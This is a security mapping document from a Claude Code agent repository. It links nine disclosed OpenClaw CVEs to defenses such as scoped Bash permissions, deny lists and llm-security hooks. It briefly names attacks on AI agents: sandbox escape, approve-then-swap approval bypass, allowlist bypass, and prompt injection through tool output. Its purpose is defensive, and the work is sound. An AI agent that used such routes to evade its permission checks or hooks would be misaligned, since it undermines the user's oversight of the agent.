open/claude-code-complete-agent
1
0
Fork 0
Code Activity Actions
claude-code-complete-agent/security/cve-mitigation-map.md
Kjell Tore Guttormsen 841cd32c66 feat(security): harden repo with scoped permissions, CVE mapping, and scan evidence 
Settings.json: 16 scoped Bash grants (was 6 wildcards), 26-pattern deny list (was 5).
CVE mapping: all 9 OpenClaw CVEs mapped to specific defenses with layer documentation.
Scan results: posture Grade D (expected without llm-security), deep scan 0 critical/high.
Hooks README: Option A — document llm-security hooks, recommend plugin installation.
README: evidence-based security section with scan data and verification instructions.

Co-Authored-By: Claude Opus 4.6 <noreply@anthropic.com>
2026-04-05 23:58:59 +02:00

5.1 KiB
Raw Permalink Blame History

CVE-to-Mitigation Map

How Claude Code's architecture and configuration defend against each OpenClaw CVE disclosed in March 2026. Each row links a specific vulnerability to the defense mechanism and where it is configured in this repository.

Mapping

CVE CVSS Attack Claude Code defense Where configured Defense type
CVE-2026-22172 9.9 Client self-declares admin scope Single-user architecture — no scope model, no multi-user auth layer Architecture (inherent) Eliminated
CVE-2026-25253 8.8 WebSocket hijack (one-click RCE) No gateway, no listening port, no WebSocket server Architecture (inherent) Eliminated
CVE-2026-22171 8.2 Arbitrary file write via media path traversal pre-write-pathguard.mjs blocks writes to sensitive paths; settings.json deny list blocks destructive commands llm-security hook + .claude/settings.json Blocked
CVE-2026-32048 7.5 Sandbox child process escape Scoped Bash permissions (16 specific commands, not Bash(*)); pre-bash-destructive.mjs blocks dangerous patterns .claude/settings.json allow list + llm-security hook Blocked
CVE-2026-32025 7.5 Brute force on localhost auth No authentication endpoint — single-user, no network service Architecture (inherent) Eliminated
CVE-2026-32049 7.5 DoS via oversized media payload No media ingestion endpoint — files processed locally, no upload handler Architecture (inherent) Eliminated
CVE-2026-32032 7.0 Shell injection via SHELL env variable pre-bash-destructive.mjs validates commands; scoped Bash permissions restrict allowed executables llm-security hook + .claude/settings.json Blocked
CVE-2026-29607 6.4 Approve-then-swap (approval bypass) Deterministic hook validation on every call (no cached approvals); post-mcp-verify.mjs scans all tool output llm-security hooks Blocked
CVE-2026-28460 5.9 Line-continuation allowlist bypass Permission matching in settings.json is not regex-based; hooks validate the actual command, not a display string .claude/settings.json + hooks Blocked

Defense layers

Claude Code's security is layered. No single mechanism is sufficient alone:

Layer 1: Architecture
  └─ No gateway, no ports, no multi-user auth
  └─ Eliminates: CVE-22172, CVE-25253, CVE-32025, CVE-32049

Layer 2: Permission model (settings.json)
  └─ Scoped Bash grants (16 specific commands)
  └─ 26-pattern deny list
  └─ Write/Edit require explicit user approval
  └─ Mitigates: CVE-32048, CVE-28460

Layer 3: Hook enforcement (llm-security plugin)
  └─ PreToolUse: block before execution
  └─ PostToolUse: scan output after execution
  └─ UserPromptSubmit: block prompt injection
  └─ Mitigates: CVE-22171, CVE-32032, CVE-29607, CVE-30741

Layer 4: Runtime monitoring (llm-security plugin)
  └─ Session guard: sliding window anomaly detection
  └─ MCP verify: description drift + volume tracking
  └─ Supply chain: package audit on every install
  └─ Detects: compound attack chains, slow exfiltration

What this does NOT cover

  • Kernel-level isolation: NemoClaw (Landlock, seccomp, netns) provides stronger containment than hooks. Hooks prevent the agent from attempting dangerous operations; kernel isolation contains the damage if prevention fails.

  • Multi-tenant separation: Claude Code is single-user. For multi-tenant scenarios, each user needs their own instance.

  • Network egress filtering: Claude Code communicates with Anthropic's API over HTTPS. It does not restrict other outbound connections. Use OS-level firewall rules for egress control.

Prompt injection (CVE-2026-30741)

Not in the original 9 CVEs but documented in OpenClaw's security advisories. The llm-security plugin provides 3-layer defense:

  1. Input scanning (pre-prompt-inject-scan.mjs): Blocks injection patterns in user prompts before the LLM sees them. Configurable: block, warn, or off.

  2. Output scanning (post-mcp-verify.mjs): Scans ALL tool output for injection attempts, HTML content traps, and suspicious patterns. Catches injection via MCP tool responses.

  3. Session pattern detection (post-session-guard.mjs): Detects the "lethal trifecta" — untrusted input combined with sensitive data access and an exfiltration sink — using a sliding window of 20 tool calls.

Supply chain (ClawHub malware)

Not a CVE but a documented incident: 824 malicious skills found in ClawHub marketplace (the ClawHavoc campaign). The llm-security plugin's pre-install-supply-chain.mjs hook covers 7 package managers with:

  • Per-ecosystem blocklists for known malicious packages
  • Age gate (packages < 72 hours old are flagged)
  • npm audit integration (critical = block, high = warn)
  • PyPI API inspection for suspicious metadata
  • Levenshtein-based typosquat detection
  • OSV.dev batch API for known vulnerabilities

Sources

CVE data from NVD and OpenClaw security advisories (March 2026). See openclaw-security-assessment.md for full analysis with statistics and category-by-category comparison.